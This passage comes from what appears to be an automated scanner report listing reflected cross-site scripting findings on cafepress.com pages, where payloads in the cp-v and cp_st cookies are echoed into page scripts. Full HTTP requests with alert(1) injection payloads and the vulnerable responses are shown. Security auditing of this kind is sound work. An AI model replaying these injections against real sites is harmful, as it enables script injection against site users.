   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAd8dde"-alert(1)-"0740f775c1c";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {

       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.117. http://www.cafepress.com/make/custom-t-shirts [cp_st cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/make/custom-t-shirts

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ba57</script><script>alert(1)</script>0e63e38f264 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /make/custom-t-shirts HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=8ba57</script><script>alert(1)</script>0e63e38f264; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW12
Cteonnt-Length: 112251
Date: Sun, 26 Dec 2010 13:48:03 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 112251

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
omain_us = 'cafepress.com';

window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'Make'
window.cafepress.tealeaf.searchTerm = '8ba57</script><script>alert(1)</script>0e63e38f264'
window.cafepress.tealeaf.salesChannel = 'Make'
window.cafepress.tealeaf.trafficMedium = 'Direct'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP
...[SNIP]...

1.118. http://www.cafepress.com/make/custom-thermos [cp-v cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/make/custom-thermos

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8eea1"-alert(1)-"d0c14b83f86 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /make/custom-thermos HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA8eea1"-alert(1)-"d0c14b83f86; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW17
Cteonnt-Length: 55394
Date: Sun, 26 Dec 2010 13:48:17 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 55394

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";


   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA8eea1"-alert(1)-"d0c14b83f86";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {

       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.119. http://www.cafepress.com/make/custom-thermos [cp_st cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/make/custom-thermos

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cc081</script><script>alert(1)</script>a5d7c25c9aa was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /make/custom-thermos HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=cc081</script><script>alert(1)</script>a5d7c25c9aa; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW17
Cteonnt-Length: 55416
Date: Sun, 26 Dec 2010 13:48:16 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 55416

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
omain_us = 'cafepress.com';

window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'Make'
window.cafepress.tealeaf.searchTerm = 'cc081</script><script>alert(1)</script>a5d7c25c9aa'
window.cafepress.tealeaf.salesChannel = 'Make'
window.cafepress.tealeaf.trafficMedium = 'Direct'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP
...[SNIP]...

1.120. http://www.cafepress.com/make/custom-water-bottles [cp-v cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/make/custom-water-bottles

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67f7b"-alert(1)-"cf8efdc4007 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /make/custom-water-bottles HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA67f7b"-alert(1)-"cf8efdc4007; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW14
Cteonnt-Length: 58828
Date: Sun, 26 Dec 2010 13:48:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 58828

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";


   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA67f7b"-alert(1)-"cf8efdc4007";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {

       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.121. http://www.cafepress.com/make/custom-water-bottles [cp_st cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/make/custom-water-bottles

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bca4a</script><script>alert(1)</script>d8d616836de was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /make/custom-water-bottles HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=bca4a</script><script>alert(1)</script>d8d616836de; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW14
Cteonnt-Length: 58850
Date: Sun, 26 Dec 2010 13:48:19 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 58850

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
omain_us = 'cafepress.com';

window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'Make'
window.cafepress.tealeaf.searchTerm = 'bca4a</script><script>alert(1)</script>d8d616836de'
window.cafepress.tealeaf.salesChannel = 'Make'
window.cafepress.tealeaf.trafficMedium = 'Direct'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP
...[SNIP]...

1.122. http://www.cafepress.com/make/holiday-invitations [cp-v cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/make/holiday-invitations

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9671b"-alert(1)-"c603f1ee3b3 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /make/holiday-invitations HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA9671b"-alert(1)-"c603f1ee3b3; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; 